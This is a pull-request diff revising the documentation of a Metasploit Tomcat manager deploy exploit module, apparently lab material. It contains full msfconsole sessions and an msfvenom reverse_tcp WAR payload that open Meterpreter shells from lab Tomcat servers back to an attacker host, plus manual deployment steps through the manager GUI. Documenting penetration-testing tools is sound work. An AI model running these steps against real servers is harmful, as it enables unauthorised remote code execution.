### PR TITLE
tomcat_mgr_deploy tomcat_mgr_upload docs

### DIFF
--- a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
+++ b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
@@ -9,7 +9,7 @@ It should be stated outright that the exploit does NOT undeploy the shellcode fr
 ### Tomcat 6 (6.0.48)
 #### Setup
 
-1. Download and install the pre-req [Java7](htp://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
+1. Download and install the pre-req [Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
 2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe)
 
 The install was default, other than adding a user during install.  No other options were changed.  The install assgined the new user the role `manager-gui`, which is Tomcat 7+ syntax.
@@ -389,9 +389,9 @@ The permission `manager-gui`, is required for this exploitation, and the `PATH` 
 ## Create payload
 This was performed on Windows XP with the following permissions as the user that was used to login:
 
-* Tomcat 6.0.48: manager
-* Tomcat 7.0.73: manager-gui
-* Tomcat 8.0.39: manager-gui
+* Tomcat 6.0.48: `manager`
+* Tomcat 7.0.73: `manager-gui`
+* Tomcat 8.0.39: `manager-gui`
 
 ```
 /metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war

--- a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
+++ b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
@@ -1,21 +1,22 @@
 # Documentation Format
 This documentation is slightly different from the standard module documentation due to the variation in variables/privileges/versions that can affect how exploitation happens.
-This documentation is broken down by OS, Tomcat version, then privilege to show exploitation at each way.
+This documentation is broken down by OS, Tomcat version, then privilege to show exploitation in each variation.
 
 # Cleanup
-It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat.  This must be done manually.
+It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat.  This must be done [manually](#manual-cleanup).
 
 ## Windows (xp sp2)
 ### Tomcat 6 (6.0.48)
 #### Setup
 
-1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
+1. Download and install the pre-req [Java7](htp://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
 2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe)
 
 The install was default, other than adding a user during install.  No other options were changed.  The install assgined the new user the role `manager-gui`, which is Tomcat 7+ syntax.
-For this exploitation, it was changed to simply `manager`
+For this exploitation, it was changed to simply `manager`.
 
-#### text/script Interface
+#### text/script Interface Exploitation
+
 1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 6.0\tomcat-users.xml` to add the following under the `<tomcat-users>` line:
 
     ```
@@ -24,6 +25,7 @@ For this exploitation, it was changed to simply `manager`
     ```
 
 2. Restart Tomcat service
+
 3. Exploit:
 
     ```
@@ -63,17 +65,21 @@ For this exploitation, it was changed to simply `manager`
     Meterpreter : java/windows
     
     ```
+
 ### Tomcat 7 (7.0.73)
+Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
+
 #### Setup
 
-1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
+1. Download and install the pre-req [Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
 2. Download and install [Tomcat7](http://apache.osuosl.org/tomcat/tomcat-7/v7.0.73/bin/apache-tomcat-7.0.73.exe)
 
 The install was default, other than adding a user during install.  No other options were changed.
 Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
 So the `/manager/html` page was visible, but deploying from there wasn't possible.
 
-#### text/script Interface
+#### text/script Interface Exploitation
+
 1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 7.0\tomcat-users.xml` to add the following under the `<tomcat-users>` line:
 
     ```
@@ -82,6 +88,7 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
     ```
 
 2. Restart the service
+
 3. Exploitation:
 
     ```
@@ -126,16 +133,18 @@ So the `/manager/html` page was visible, but deploying from there wasn't possibl
     ```
 
 ### Tomcat 8 (8.0.39)
+Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
+
 #### Setup
 
-1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
+1. Download and install the pre-req [Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
 2. Download and install [Tomcat8](http://apache.osuosl.org/tomcat/tomcat-8/v8.0.39/bin/apache-tomcat-8.0.39.exe)
 
 The install was default, other than adding a user during install.  No other options were changed.
 Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
-So the /manager/html page was visible, but deploying from there wasn't possible.
+So the `/manager/html` page was visible, but deploying from there wasn't possible.
 
-#### text/script interface
+#### text/script Interface Exploitation
 
 1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml` to add the following under the `<tomcat-users` line:
 
@@ -145,6 +154,7 @@ So the /manager/html page was visible, but deploying from there wasn't possible.
     ```
 
 2. Restart the service
+
 3. Exploitation:
 
     ```
@@ -183,7 +193,9 @@ So the /manager/html page was visible, but deploying from there wasn't possible.
     ```
 
 ## Linux
+
 ### Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit
+
 #### Setup
 
 1. Install Tomcat and dependencies: `sudo apt-get install tomcat6 tomcat6-admin`
@@ -198,6 +210,7 @@ So the /manager/html page was visible, but deploying from there wasn't possible.
   ```
 
 2. Restart Tomcat: `sudo service tomcat6 restart`
+
 3. Exploit:
 
     ```
@@ -238,12 +251,12 @@ So the /manager/html page was visible, but deploying from there wasn't possible.
     ```
 
 ### Tomcat7 (7.0.68) - Ubuntu server 16.04 64bit
-Of note, as of Tomcat 7, the permission role 'manager' has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
+Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
 
 #### Setup
 1. Install Tomcat and dependencies: `apt-get install tomcat7 tomcat7-admin`
 
-#### text/script interface
+#### text/script Interface Exploitation
 
 1. Edit `/etc/tomcat7/tomcat-users.xml` to add:
 
@@ -255,6 +268,7 @@ Of note, as of Tomcat 7, the permission role 'manager' has been divided into sev
 2. Restart Tomcat: `sudo service tomcat7 restart`
   1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
 ` as opposed to `403 Access Denied`
+
 3. Exploit:
 
     ```
@@ -297,24 +311,31 @@ Of note, as of Tomcat 7, the permission role 'manager' has been divided into sev
     Meterpreter  : x86/linux
     ```
 
-#### gui interface
-Attempted to get the the GUI one to work, I wasn't able to.  I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`.  However, my attempts were unsuccessful.
+#### gui Interface
+The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`.  However, my attempts were unsuccessful.  [Manual exploitation is possible](#manual-exploitation)
 
 ### Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit
 Of note, as of 7, the permission role 'manager' has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
+
 #### Setup
+
 1. `apt-get install tomcat8 tomcat8-admin`
 
-#### text/script interface
+#### text/script Interface Exploitation
+
 1. Edit `/etc/tomcat8/tomcat-users.xml` to add:
+
   ```
   <role rolename="manager-script"/>
   <user username="tomcat" password="tomcat" roles="manager-script"/>
   ```
+
 2. Restart tomcat: `sudo service tomcat8 restart`
   1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
 ` as opposed to `403 Access Denied`
+
 3. Exploit:
+
     ```
     msf > use exploit/multi/http/tomcat_mgr_deploy 
     msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
@@ -353,17 +374,18 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
     Architecture : x64
     Meterpreter  : x86/linux
     ```
-#### gui interface
-Attempted to get the the GUI one to work, I wasn't able to.  I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`.  However, my attempts were unsuccessful.
 
+#### gui Interface
+The permission `manager-gui`, is required for this exploitation, and the `PATH` should be `/manager/html`.  However, my attempts were unsuccessful.  [Manual exploitation is possible](#manual-exploitation)
 
 # Manual Exploitation
 
 ## Create payload
 This was performed on Windows XP with the following permissions as the user that was used to login:
-Tomcat 6.0.48: manager
-Tomcat 7.0.73: manager-gui
-Tomcat 8.0.39: manager-gui
+
+* Tomcat 6.0.48: manager
+* Tomcat 7.0.73: manager-gui
+* Tomcat 8.0.39: manager-gui
 
 ```
 /metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war
@@ -371,7 +393,9 @@ Payload size: 6072 bytes
 Final size of war file: 6072 bytes
 Saved as: meterp.war
 ```
+
 ## Setup Handler
+
 ```
 msf > use exploit/multi/handler 
 msf exploit(handler) > set payload java/meterpreter/reverse_tcp 
@@ -385,7 +409,9 @@ msf exploit(handler) > exploit
 [*] Started reverse TCP handler on 192.168.2.117:7777 
 [*] Starting the payload handler...
 ```
+
 ## Deploy
+
 1. With a web browser, browse to `http://<ip>:<port>/manager/html`
 2. Enter credentials (no default)
 3. Under `Deploy` > `WAR file to deploy`, click browse to select `meterp.war`, click `Deploy`
@@ -405,6 +431,6 @@ OS          : Windows XP 5.1 (x86)
 Meterpreter : java/windows
 ```
 
-## Cleanup
+## Manual Cleanup
 
 This will NOT remove the meterpreter from Tomcat, click `Undeploy` within the `Application` list to remove `meterp` from Tomcat.

--- a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
+++ b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
@@ -3,7 +3,7 @@ This documentation is slightly different from the standard module documentation 
 This documentation is broken down by OS, Tomcat version, then privilege to show exploitation in each variation.
 
 # Cleanup
-It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat.  This can be done [manually](#manual-cleanup).
+It should be stated outright that the exploit MAY NOT undeploy the shellcode from Tomcat.  This can be done [manually](#manual-cleanup).
 
 # tomcat_mgr_upload
 This module is VERY similar to `exploit/multi/http/tomcat_mgr_upload`, the main difference is this uses a `PUT` HTTP request, instead of going through a `POST` HTTP request through the GUI.
@@ -205,10 +205,10 @@ Of note, the user was given `manager-gui` permissions by default.
 
 1. Edit `/etc/tomcat6/tomcat-users.xml` to add the following:
 
-  ```
-  <role rolename="manager"/>
-  <user username="tomcat" password="tomcat" roles="manager"/>
-  ```
+    ```
+    <role rolename="manager"/>
+    <user username="tomcat" password="tomcat" roles="manager"/>
+    ```
 
 2. Restart Tomcat: `sudo service tomcat6 restart`
 
@@ -323,10 +323,10 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
 
 1. Edit `/etc/tomcat8/tomcat-users.xml` to add:
 
-  ```
-  <role rolename="manager-script"/>
-  <user username="tomcat" password="tomcat" roles="manager-script"/>
-  ```
+    ```
+    <role rolename="manager-script"/>
+    <user username="tomcat" password="tomcat" roles="manager-script"/>
+    ```
 
 2. Restart tomcat: `sudo service tomcat8 restart`
   1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]

--- a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
+++ b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
@@ -3,17 +3,16 @@ This documentation is slightly different from the standard module documentation 
 This documentation is broken down by OS, Tomcat version, then privilege to show exploitation at each way.
 
 ## Windows (xp sp2)
-### Tomcat 7 (6.0.48)
+### Tomcat 6 (6.0.48)
 #### Setup
 
 1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
 2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe)
 
 The install was default, other than adding a user during install.  No other options were changed.
-Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
-So the /manager/html page was visible, but deploying from there wasn't possible.
 
 #### text/script interface
+
 ### Tomcat 7 (7.0.73)
 #### Setup
 
@@ -22,7 +21,7 @@ So the /manager/html page was visible, but deploying from there wasn't possible.
 
 The install was default, other than adding a user during install.  No other options were changed.
 Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
-So the /manager/html page was visible, but deploying from there wasn't possible.
+So the `/manager/html` page was visible, but deploying from there wasn't possible.
 
 #### text/script interface
 
@@ -37,8 +36,15 @@ Of note, while the user was given `manager-gui` permissions, they didn't actuall
 So the /manager/html page was visible, but deploying from there wasn't possible.
 
 #### text/script interface
-`C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml`
 
+1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml` to add the following:
+```
+<role rolename="manager"/>
+<user username="tomcat" password="tomcat" roles="manager"/>
+```
+
+2. Exploitation:
+```
 msf > use exploit/multi/http/tomcat_mgr_deploy 
 msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
 rhost => 192.168.2.108
@@ -82,13 +88,13 @@ sudo apt-get install tomcat6 tomcat6-admin
 ```
 #### Exploit
 
-edit `/etc/tomcat6/tomcat-users.xml` to add the following:
+1. Edit `/etc/tomcat6/tomcat-users.xml` to add the following:
 ```
 <role rolename="manager"/>
 <user username="tomcat" password="tomcat" roles="manager"/>
 ```
-Restart tomcat: `sudo service tomcat6 restart`
-
+2. Restart Tomcat: `sudo service tomcat6 restart`
+3. Exploit:
 ```
 msf > use exploit/multi/http/tomcat_mgr_deploy 
 msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156
@@ -132,15 +138,16 @@ Of note, as of Tomcat 7, the permission role 'manager' has been divided into sev
 1. Tomcat 7: `apt-get install tomcat7 tomcat7-admin`
 
 #### text/script interface
-edit `/etc/tomcat7/tomcat-users.xml` to add:
+
+1. Edit `/etc/tomcat7/tomcat-users.xml` to add:
 ```
 <role rolename="manager-script"/>
 <user username="tomcat" password="tomcat" roles="manager-script"/>
 ```
-Restart tomcat. `sudo service tomcat7 restart` (or tomcat8)
-To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
+2. Restart Tomcat: `sudo service tomcat7 restart`
+  1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
 ` as opposed to `403 Access Denied`
-
+3. Exploit:
 ```
 msf > use exploit/multi/http/tomcat_mgr_deploy 
 msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
@@ -189,15 +196,15 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
 1. `apt-get install tomcat8 tomcat8-admin`
 
 #### text/script interface
-edit `/etc/tomcat8/tomcat-users.xml` to add:
+1. Edit `/etc/tomcat8/tomcat-users.xml` to add:
 ```
 <role rolename="manager-script"/>
 <user username="tomcat" password="tomcat" roles="manager-script"/>
 ```
-Restart tomcat: `sudo service tomcat8 restart`
-To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
+2. Restart tomcat: `sudo service tomcat8 restart`
+  1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy]
 ` as opposed to `403 Access Denied`
-
+3. Exploit:
 ```
 msf > use exploit/multi/http/tomcat_mgr_deploy 
 msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
@@ -238,4 +245,3 @@ Meterpreter  : x86/linux
 ```
 #### gui interface
 Attempted to get the the GUI one to work, I wasn't able to.  I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`.  However, my attempts were unsuccessful.
-

--- a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
+++ b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md
@@ -2,6 +2,9 @@
 This documentation is slightly different from the standard module documentation due to the variation in variables/privileges/versions that can affect how exploitation happens.
 This documentation is broken down by OS, Tomcat version, then privilege to show exploitation at each way.
 
+# Cleanup
+It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat.  This must be done manually.
+
 ## Windows (xp sp2)
 ### Tomcat 6 (6.0.48)
 #### Setup
@@ -9,10 +12,57 @@ This documentation is broken down by OS, Tomcat version, then privilege to show 
 1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
 2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe)
 
-The install was default, other than adding a user during install.  No other options were changed.
+The install was default, other than adding a user during install.  No other options were changed.  The install assgined the new user the role `manager-gui`, which is Tomcat 7+ syntax.
+For this exploitation, it was changed to simply `manager`
 
-#### text/script interface
+#### text/script Interface
+1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 6.0\tomcat-users.xml` to add the following under the `<tomcat-users>` line:
 
+    ```
+    <role rolename="manager"/>
+    <user username="tomcat" password="tomcat" roles="manager"/>
+    ```
+
+2. Restart Tomcat service
+3. Exploit:
+
+    ```
+    msf > use exploit/multi/http/tomcat_mgr_deploy 
+    msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
+    rhost => 192.168.2.108
+    msf exploit(tomcat_mgr_deploy) > set verbose true
+    verbose => true
+    msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
+    HttpPassword => tomcat
+    msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
+    HttpUsername => tomcat
+    msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp 
+    payload => java/meterpreter/reverse_tcp
+    msf exploit(tomcat_mgr_deploy) > set target 1
+    target => 1
+    msf exploit(tomcat_mgr_deploy) > set rport 8086
+    rport => 8086
+    msf exploit(tomcat_mgr_deploy) > set path /manager
+    path => /manager
+    msf exploit(tomcat_mgr_deploy) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Using manually select target "Java Universal"
+    [*] Uploading 6071 bytes as scEYoK0.war ...
+    [!] No active DB -- Credential data will not be saved!
+    [*] Executing /scEYoK0/jgj6tWcImjhc7rH2F4TDjCpXG.jsp...
+    [*] Undeploying scEYoK0 ...
+    [*] Sending stage (49409 bytes) to 192.168.2.108
+    [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:1663) at 2017-01-14 14:30:52 -0500
+    
+    meterpreter > sysinfo
+    Computer    : winxp
+    OS          : Windows XP 5.1 (x86)
+    Meterpreter : java/windows
+    
+    ```
 ### Tomcat 7 (7.0.73)
 #### Setup
 
@@ -23,7 +73,57 @@ The install was default, other than adding a user during install.  No other opti
 Of note, while the user was given `manager-gui` permissions, they didn't actually define that role.
 So the `/manager/html` page was visible, but deploying from there wasn't possible.
 
-#### text/script interface
+#### text/script Interface
+1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 7.0\tomcat-users.xml` to add the following under the `<tomcat-users>` line:
+
+    ```
+    <role rolename="manager-script"/>
+    <user username="tomcat" password="tomcat" roles="manager-script"/>
+    ```
+
+2. Restart the service
+3. Exploitation:
+
+    ```
+    msf > use exploit/multi/http/tomcat_mgr_deploy 
+    msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
+    rhost => 192.168.2.108
+    msf exploit(tomcat_mgr_deploy) > set path /manager/text
+    path => /manager/text
+    msf exploit(tomcat_mgr_deploy) > set verbose true
+    verbose => true
+    msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
+    HttpPassword => tomcat
+    msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
+    HttpUsername => tomcat
+    msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    msf exploit(tomcat_mgr_deploy) > set rport 8087
+    rport => 8087
+    msf exploit(tomcat_mgr_deploy) > set payload java/
+    set payload java/meterpreter/bind_tcp       set payload java/meterpreter/reverse_tcp    set payload java/shell_reverse_tcp
+    set payload java/meterpreter/reverse_http   set payload java/shell/bind_tcp             
+    set payload java/meterpreter/reverse_https  set payload java/shell/reverse_tcp          
+    msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp 
+    payload => java/meterpreter/reverse_tcp
+    msf exploit(tomcat_mgr_deploy) > set target 1
+    target => 1
+    msf exploit(tomcat_mgr_deploy) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Using manually select target "Java Universal"
+    [*] Uploading 6086 bytes as Cl6t6gurtwIO59zV3Lt6.war ...
+    [!] No active DB -- Credential data will not be saved!
+    [*] Executing /Cl6t6gurtwIO59zV3Lt6/qTIP.jsp...
+    [*] Undeploying Cl6t6gurtwIO59zV3Lt6 ...
+    [*] Sending stage (49409 bytes) to 192.168.2.108
+    [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1656) at 2017-01-14 14:27:21 -0500
+    
+    meterpreter > sysinfo
+    Computer    : winxp
+    OS          : Windows XP 5.1 (x86)
+    Meterpreter : java/windows
+    ```
 
 ### Tomcat 8 (8.0.39)
 #### Setup
@@ -37,156 +137,166 @@ So the /manager/html page was visible, but deploying from there wasn't possible.
 
 #### text/script interface
 
-1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml` to add the following:
-```
-<role rolename="manager"/>
-<user username="tomcat" password="tomcat" roles="manager"/>
-```
+1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml` to add the following under the `<tomcat-users` line:
 
-2. Exploitation:
-```
-msf > use exploit/multi/http/tomcat_mgr_deploy 
-msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
-rhost => 192.168.2.108
-msf exploit(tomcat_mgr_deploy) > set rport 8088
-rport => 8088
-msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp 
-payload => java/meterpreter/reverse_tcp
-msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
-lhost => 192.168.2.117
-msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
-HttpPassword => tomcat
-msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
-HttpUsername => tomcat
-msf exploit(tomcat_mgr_deploy) > set target 1
-target => 1
-msf exploit(tomcat_mgr_deploy) > exploit
-msf exploit(tomcat_mgr_deploy) > set path /manager/text
-path => /manager/text
-msf exploit(tomcat_mgr_deploy) > exploit
+    ```
+    <role rolename="manager-script"/>
+    <user username="tomcat" password="tomcat" roles="manager-script"/>
+    ```
 
-[*] Started reverse TCP handler on 192.168.2.117:4444 
-[*] Using manually select target "Java Universal"
-[*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ...
-[*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp...
-[*] Undeploying c6TYmkd8YAe8LqKQhSCr ...
-[*] Sending stage (49409 bytes) to 192.168.2.108
-[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500
+2. Restart the service
+3. Exploitation:
 
-meterpreter > sysinfo
-Computer    : winxp
-OS          : Windows XP 5.1 (x86)
-Meterpreter : java/windows
-```
-
+    ```
+    msf > use exploit/multi/http/tomcat_mgr_deploy 
+    msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
+    rhost => 192.168.2.108
+    msf exploit(tomcat_mgr_deploy) > set rport 8088
+    rport => 8088
+    msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp 
+    payload => java/meterpreter/reverse_tcp
+    msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
+    HttpPassword => tomcat
+    msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
+    HttpUsername => tomcat
+    msf exploit(tomcat_mgr_deploy) > set target 1
+    target => 1
+    msf exploit(tomcat_mgr_deploy) > exploit
+    msf exploit(tomcat_mgr_deploy) > set path /manager/text
+    path => /manager/text
+    msf exploit(tomcat_mgr_deploy) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Using manually select target "Java Universal"
+    [*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ...
+    [*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp...
+    [*] Undeploying c6TYmkd8YAe8LqKQhSCr ...
+    [*] Sending stage (49409 bytes) to 192.168.2.108
+    [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500
+    
+    meterpreter > sysinfo
+    Computer    : winxp
+    OS          : Windows XP 5.1 (x86)
+    Meterpreter : java/windows
+    ```
 
 ## Linux
 ### Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit
 #### Setup
-```
-sudo apt-get install tomcat6 tomcat6-admin
-```
+
+1. Install Tomcat and dependencies: `sudo apt-get install tomcat6 tomcat6-admin`
+
 #### Exploit
 
 1. Edit `/etc/tomcat6/tomcat-users.xml` to add the following:
-```
-<role rolename="manager"/>
-<user username="tomcat" password="tomcat" roles="manager"/>
-```
+
+  ```
+  <role rolename="manager"/>
+  <user username="tomcat" password="tomcat" roles="manager"/>
+  ```
+
 2. Restart Tomcat: `sudo service tomcat6 restart`
 3. Exploit:
-```
-msf > use exploit/multi/http/tomcat_mgr_deploy 
-msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156
-rhost => 192.168.2.156
-msf exploit(tomcat_mgr_deploy) > set rport 8080
-rport => 8080
-msf exploit(tomcat_mgr_deploy) > set verbose true
-verbose => true
-msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
-HttpUsername => tomcat
-msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
-HttpPassword => tomcat
-msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
-payload => linux/x86/mettle/reverse_tcp
-msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
-lhost => 192.168.2.117
-msf exploit(tomcat_mgr_deploy) > set target 3
-target => 3
-msf exploit(tomcat_mgr_deploy) > exploit
 
-[*] Started reverse TCP handler on 192.168.2.117:4444 
-[*] Using manually select target "Linux x86"
-[*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ...
-[!] No active DB -- Credential data will not be saved!
-[*] Executing /9bj4IYa66cSpdK/g3Yxbv3.jsp...
-[*] Transmitting intermediate stager...(106 bytes)
-[*] Sending stage (335800 bytes) to 192.168.2.156
-[*] Undeploying 9bj4IYa66cSpdK ...
-[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500
-
-meterpreter > sysinfo
-Computer     : Ubuntu14.04
-OS           : Ubuntu 14.04 (Linux 4.2.0-27-generic)
-Architecture : x64
-Meterpreter  : x86/linux
-```
+    ```
+    msf > use exploit/multi/http/tomcat_mgr_deploy 
+    msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156
+    rhost => 192.168.2.156
+    msf exploit(tomcat_mgr_deploy) > set rport 8080
+    rport => 8080
+    msf exploit(tomcat_mgr_deploy) > set verbose true
+    verbose => true
+    msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
+    HttpUsername => tomcat
+    msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
+    HttpPassword => tomcat
+    msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
+    payload => linux/x86/mettle/reverse_tcp
+    msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    msf exploit(tomcat_mgr_deploy) > set target 3
+    target => 3
+    msf exploit(tomcat_mgr_deploy) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Using manually select target "Linux x86"
+    [*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ...
+    [!] No active DB -- Credential data will not be saved!
+    [*] Executing /9bj4IYa66cSpdK/g3Yxbv3.jsp...
+    [*] Transmitting intermediate stager...(106 bytes)
+    [*] Sending stage (335800 bytes) to 192.168.2.156
+    [*] Undeploying 9bj4IYa66cSpdK ...
+    [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500
+    
+    meterpreter > sysinfo
+    Computer     : Ubuntu14.04
+    OS           : Ubuntu 14.04 (Linux 4.2.0-27-generic)
+    Architecture : x64
+    Meterpreter  : x86/linux
+    ```
 
 ### Tomcat7 (7.0.68) - Ubuntu server 16.04 64bit
 Of note, as of Tomcat 7, the permission role 'manager' has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
+
 #### Setup
-1. Tomcat 7: `apt-get install tomcat7 tomcat7-admin`
+1. Install Tomcat and dependencies: `apt-get install tomcat7 tomcat7-admin`
 
 #### text/script interface
 
 1. Edit `/etc/tomcat7/tomcat-users.xml` to add:
-```
-<role rolename="manager-script"/>
-<user username="tomcat" password="tomcat" roles="manager-script"/>
-```
+
+    ```
+    <role rolename="manager-script"/>
